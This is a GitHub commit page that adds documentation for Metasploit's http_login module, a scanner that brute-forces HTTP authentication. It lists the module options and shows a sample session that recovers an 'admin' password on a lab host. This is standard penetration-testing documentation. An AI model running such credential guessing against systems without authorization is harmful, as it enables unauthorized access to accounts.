Skip to content

Commit 3a8a85b

Browse files
committed
Land rapid7#9065, add doc for auxiliary/scanner/http/http_login
Land rapid7#9065
2 parents 2503d2a + fc40fe0 commit 3a8a85b

File tree

1 file changed

+72
-0
lines changed

1 file changed

+72
-0
lines changed
Lines changed: 72 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,72 @@
1+
## Description
2+
3+
This module is a brute-force login scanner that attempts to authenticate to a system using HTTP authentication.
4+
5+
## Verification Steps
6+
7+
1. Do: ```use auxiliary/scanner/http/http_login```
8+
2. Do: ```set RHOSTS [IP]```
9+
3. Do: ```set RPORT [PORT]```
10+
4. Do: ```run```
11+
12+
## Scenarios
13+
14+
**Running the scanner**
15+
16+
```
17+
msf > use auxiliary/scanner/http/http_login
18+
msf auxiliary(http_login) > show options
19+
20+
Module options (auxiliary/scanner/http/http_login):
21+
22+
Name Current Setting Required Description
23+
---- --------------- -------- -----------
24+
AUTH_URI no The URI to authenticate against (default:auto)
25+
BLANK_PASSWORDS false no Try blank passwords for all users
26+
BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5
27+
DB_ALL_CREDS false no Try each user/password couple stored in the current database
28+
DB_ALL_PASS false no Add all passwords in the current database to the list
29+
DB_ALL_USERS false no Add all users in the current database to the list
30+
PASS_FILE /usr/share/metasploit-framework/data/wordlists/http_default_pass.txt no File containing passwords, one per line
31+
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
32+
REQUESTTYPE GET no Use HTTP-GET or HTTP-PUT for Digest-Auth, PROPFIND for WebDAV (default:GET)
33+
RHOSTS yes The target address range or CIDR identifier
34+
RPORT 80 yes The target port (TCP)
35+
SSL false no Negotiate SSL/TLS for outgoing connections
36+
STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host
37+
THREADS 1 yes The number of concurrent threads
38+
USERPASS_FILE /usr/share/metasploit-framework/data/wordlists/http_default_userpass.txt no File containing users and passwords separated by space, one pair per line
39+
USER_AS_PASS false no Try the username as the password for all users
40+
USER_FILE /usr/share/metasploit-framework/data/wordlists/http_default_users.txt no File containing users, one per line
41+
VERBOSE true yes Whether to print output for all attempts
42+
VHOST
43+
msf auxiliary(http_login) > set AUTH_URI /xampp/
44+
AUTH_URI => /xampp/
45+
msf auxiliary(http_login) > set RHOSTS 192.168.1.201
46+
RHOSTS => 192.168.1.201
47+
msf auxiliary(http_login) > set VERBOSE false
48+
VERBOSE => false
49+
msf auxiliary(http_login) > run
50+
51+
[*] Attempting to login to http://192.168.1.201:80/xampp/ with Basic authentication
52+
[+] http://192.168.1.201:80/xampp/ - Successful login 'admin' : 's3cr3t'
53+
[*] http://192.168.1.201:80/xampp/ - Random usernames are not allowed.
54+
[*] http://192.168.1.201:80/xampp/ - Random passwords are not allowed.
55+
[*] Scanned 1 of 1 hosts (100% complete)
56+
[*] Auxiliary module execution completed
57+
msf auxiliary(http_login) >
58+
```
59+
60+
**Checking the credentials stored**
61+
62+
```
63+
msf auxiliary(http_login) > creds
64+
Credentials
65+
===========
66+
67+
host origin service public private realm private_type
68+
---- ------ ------- ------ ------- ----- ------------
69+
192.168.1.201 192.168.1.201 80/tcp (http) admin s3cr3t Password
70+
71+
msf auxiliary(http_login) >
72+
```

0 commit comments

Comments
 (0)